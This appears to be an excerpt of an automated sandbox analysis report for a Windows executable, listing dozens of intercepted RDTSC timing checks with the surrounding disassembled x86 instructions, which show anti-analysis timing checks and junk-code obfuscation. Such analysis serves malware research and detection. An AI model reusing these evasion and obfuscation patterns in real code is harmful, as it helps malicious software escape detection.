Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C14C63 second address: C14C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF4D46D40BDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13133 second address: C13139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13139 second address: C1314D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF4D46D40BDh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1314D second address: C13151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13151 second address: C1317F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D46D40C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jns 00007FF4D46D40B6h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FF4D46D40B6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1317F second address: C13183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C132D1 second address: C132D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13A6C second address: C13A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13A70 second address: C13A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13A76 second address: C13A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF4D529DDE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13A86 second address: C13A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13A8A second address: C13A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13A90 second address: C13AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jbe 00007FF4D46D40B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13AA3 second address: C13AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13AAD second address: C13AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13C24 second address: C13C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13C2A second address: C13C75 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF4D46D40B6h 0x00000008 jmp 00007FF4D46D40C0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FF4D46D40D4h 0x00000015 jmp 00007FF4D46D40BBh 0x0000001a jmp 00007FF4D46D40C3h 0x0000001f pushad 0x00000020 jmp 00007FF4D46D40BAh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13C75 second address: C13C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D529DDEBh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BDDD13 second address: BDDD2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF4D46D40BDh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BDDD2A second address: BDDD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BDDD2E second address: BDDD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13DDB second address: C13DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C13DE1 second address: C13DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF4D46D40B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C147A5 second address: C147A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C17D63 second address: C17D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FF4D46D40C4h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jng 00007FF4D46D40C8h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C17D8C second address: C17D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C17D90 second address: C17DA1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C17DA1 second address: C17DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C17DA8 second address: C17DAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C17EC6 second address: C17ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1EF9B second address: C1EFB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF4D46D40C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BEB73E second address: BEB757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BEB757 second address: BEB77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D46D40C1h 0x00000009 jnp 00007FF4D46D40B6h 0x0000000f popad 0x00000010 push eax 0x00000011 jbe 00007FF4D46D40B6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BEB77D second address: BEB783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1E3E2 second address: C1E3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1E3F1 second address: C1E3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF4D529DDE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1E3FB second address: C1E3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1E6B4 second address: C1E6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF4D529DDE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1E7EB second address: C1E7F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1E7F9 second address: C1E7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1ED07 second address: C1ED1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D46D40C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C1ED1D second address: C1ED2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C230A6 second address: C230AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C230AA second address: C230B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C230B0 second address: C230B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE803E second address: BE8044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE8044 second address: BE804C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2382D second address: C23831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C23831 second address: C23878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FF4D46D40C5h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF4D46D40BAh 0x0000001a popad 0x0000001b push ebx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007FF4D46D40B6h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C23878 second address: C23885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C23885 second address: C238D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jg 00007FF4D46D40C2h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FF4D46D40B8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d call 00007FF4D46D40B9h 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C238D2 second address: C238FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4D529DDF0h 0x00000009 popad 0x0000000a jp 00007FF4D529DDECh 0x00000010 jbe 00007FF4D529DDE6h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jno 00007FF4D529DDE6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C238FE second address: C2392A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF4D46D40C6h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2392A second address: C2393F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF4D529DDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C23D34 second address: C23D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF4D46D40B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C23F5B second address: C23F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C23F61 second address: C23F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2403D second address: C2404B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C24785 second address: C2478F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2478F second address: C24793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C24793 second address: C24797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C24855 second address: C2487A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF4D529DDF9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2487A second address: C24884 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C24A37 second address: C24A3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C24AD2 second address: C24AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C25A5D second address: C25A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C25A63 second address: C25A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C287A3 second address: C287AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C287AA second address: C287B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF4D46D40B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE63DE second address: BE63E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE63E3 second address: BE63E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE63E9 second address: BE641C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007FF4D529DDF4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE641C second address: BE6420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C28D95 second address: C28E27 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF4D529DDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FF4D529DDE8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D38D4h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FF4D529DDE8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push edx 0x00000048 jbe 00007FF4D529DDFBh 0x0000004e jmp 00007FF4D529DDF5h 0x00000053 pop edi 0x00000054 push esi 0x00000055 stc 0x00000056 pop edi 0x00000057 push 00000000h 0x00000059 mov di, 2224h 0x0000005d xchg eax, ebx 0x0000005e jmp 00007FF4D529DDECh 0x00000063 push eax 0x00000064 js 00007FF4D529DDF0h 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C27562 second address: C27578 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF4D46D40BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C299A2 second address: C29A00 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, 0E00h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FF4D529DDE8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FF4D529DDE8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 clc 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C29A00 second address: C29A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C29A04 second address: C29A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C29A1A second address: C29A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D46D40C3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A3FD second address: C2A401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A401 second address: C2A406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A18F second address: C2A194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A194 second address: C2A199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A199 second address: C2A1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF4D529DDE6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A1AD second address: C2A1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A1B1 second address: C2A1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2AD56 second address: C2AD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2A1B5 second address: C2A1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
